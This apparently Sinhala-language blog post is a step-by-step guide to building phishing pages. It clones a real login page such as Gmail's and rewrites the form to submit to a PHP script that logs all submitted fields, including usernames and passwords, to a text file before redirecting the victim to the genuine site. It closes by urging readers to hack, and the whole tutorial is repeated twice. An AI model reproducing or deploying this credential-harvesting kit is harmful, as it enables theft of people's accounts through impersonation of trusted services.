ඔන්න මම අද බොහොම වැදගත් ලිපියක් තමා ලියන්න යන්නේ....මම කියලා දීපු ක්රම වලට අනුව phishing ගැන ඔයාලට ලොකු දැනුමක් ලැබෙන්න ඇති කියලා මම හිතනවා..ඒක නිසාම වෙන්න ඇති මට ගොඩක් email ලැබෙනවා එක එක වෙබ් සයිට් වලට fake login pages නැත්තන් phishers හදලා දෙන්න කියලා...
ඉතින් ඔන්න මම හිතුවා මේ විදිහට phishers හදන විදිහ කියලා දෙන්න....ඒක ඔය හිතන තරම් ගේමක් නෑ....හැබැයි මගේ කලින් phishing ගැන මුල්ම ලිපිය කියවලා නැත්තන් මෙතනින් ගිහින් කියවලා එන්න...
හරි එහෙනම් අපි වැඩේ පටන් ගමු.....
මුලින්ම යන්න ඔයාට phisher හදන්න ඕන වෙබ් සයිට් එකේ sign in වෙන්න තියන වෙබ් පිටුවට...
උදාහරනයක් ව්දිහට gmail වලටනම් www.gmail.com තමා යන්න ඕනේ...
හරි දැන් ඔය web site එකේ empty space තියන තැනක right ක්ලික් කරලා view source දෙන්න
දැන් ඔයාට web page එකේ source එක බලාගන්ඩ පුලුවන්..ඒක notepad එකකට කොපි කර ගන්න..දැන් ඒකට කැමති නමක් දීලා html document එකක් විදිහට save කරගන්න..ඒ කිව්වේ ඔයා ඒකට දාන නමේ අගට .html කියන කෑල්ල එකතු කරලා save කරන්න....
හරි දැන් ආපහු ඒ html document එක notepad එකෙන් open කරගන්න....
හරි දැන් ඒ notepad එක ඇතුලේ තියනවා " action=http//...." දැන් ඒ string එක හොයා ගෙන "action=login.php" කියලා වෙනස් කරන්න...
ඊට පස්සේ ඒකෙම තියනවා "method=post" කියලා string එකක්...ඒක වෙනස් කරන්න "method=get" කියලා....දැන් මේක html document එකක් විදිහට save කරන්න...
හරි දැන් වැඩේ බාගයක් ඉවරයි...
දැන් අපි හදා ගන්න ඕනේ login.php ෆයිල් එක...
බය වෙන්න එපා...මහා ලොකු දෙයක් කරන්න නෑ...ඉස්සරලාම notepad එකක් open කරගෙන මම මේ පල්ලේහා දීලා තියන script එක කොපි කරන්න...
<?php
header ('Location: http://yoururl.com');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle,
$value);
fwrite($handle, "\r\n"); }
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
මේකේ www.yoururl.com කියන එක වෙනුවට දාන්න ඕනේ ඔයා මේ phisher එක හදන website එකේ url එක...මොකද කියනවානම් කවුරුහරි ඔයාගේ phisher ගෙන් ලොග් වෙන්න හදද්දි එයාව rdirect වෙන්නේ ඔයා මෙතනට ලබා දෙන url එකට....
හරි දැන් ඒක ඔහොම හදා ගත්තනම් ඒක save කරන්න login.php කියලා....
හරි ඔන්න එහෙනම් වැඩේ ඉවරයි...ඔය තියෙන්නේ ඔයගේ fake login pages ටික....එහෙනම් හොදට හැක් කරන්නකෝ...
KEEP IN TOUCH WITH ME
ඉතින් ඔන්න මම හිතුවා මේ විදිහට phishers හදන විදිහ කියලා දෙන්න....ඒක ඔය හිතන තරම් ගේමක් නෑ....හැබැයි මගේ කලින් phishing ගැන මුල්ම ලිපිය කියවලා නැත්තන් මෙතනින් ගිහින් කියවලා එන්න...
හරි එහෙනම් අපි වැඩේ පටන් ගමු.....
මුලින්ම යන්න ඔයාට phisher හදන්න ඕන වෙබ් සයිට් එකේ sign in වෙන්න තියන වෙබ් පිටුවට...
උදාහරනයක් ව්දිහට gmail වලටනම් www.gmail.com තමා යන්න ඕනේ...
හරි දැන් ඔය web site එකේ empty space තියන තැනක right ක්ලික් කරලා view source දෙන්න
දැන් ඔයාට web page එකේ source එක බලාගන්ඩ පුලුවන්..ඒක notepad එකකට කොපි කර ගන්න..දැන් ඒකට කැමති නමක් දීලා html document එකක් විදිහට save කරගන්න..ඒ කිව්වේ ඔයා ඒකට දාන නමේ අගට .html කියන කෑල්ල එකතු කරලා save කරන්න....
හරි දැන් ආපහු ඒ html document එක notepad එකෙන් open කරගන්න....
හරි දැන් ඒ notepad එක ඇතුලේ තියනවා " action=http//...." දැන් ඒ string එක හොයා ගෙන "action=login.php" කියලා වෙනස් කරන්න...
ඊට පස්සේ ඒකෙම තියනවා "method=post" කියලා string එකක්...ඒක වෙනස් කරන්න "method=get" කියලා....දැන් මේක html document එකක් විදිහට save කරන්න...
හරි දැන් වැඩේ බාගයක් ඉවරයි...
දැන් අපි හදා ගන්න ඕනේ login.php ෆයිල් එක...
බය වෙන්න එපා...මහා ලොකු දෙයක් කරන්න නෑ...ඉස්සරලාම notepad එකක් open කරගෙන මම මේ පල්ලේහා දීලා තියන script එක කොපි කරන්න...
<?php
header ('Location: http://yoururl.com');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle,
$value);
fwrite($handle, "\r\n"); }
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
මේකේ www.yoururl.com කියන එක වෙනුවට දාන්න ඕනේ ඔයා මේ phisher එක හදන website එකේ url එක...මොකද කියනවානම් කවුරුහරි ඔයාගේ phisher ගෙන් ලොග් වෙන්න හදද්දි එයාව rdirect වෙන්නේ ඔයා මෙතනට ලබා දෙන url එකට....
හරි දැන් ඒක ඔහොම හදා ගත්තනම් ඒක save කරන්න login.php කියලා....
හරි ඔන්න එහෙනම් වැඩේ ඉවරයි...ඔය තියෙන්නේ ඔයගේ fake login pages ටික....එහෙනම් හොදට හැක් කරන්නකෝ...
KEEP IN TOUCH WITH ME
No comments:
Post a Comment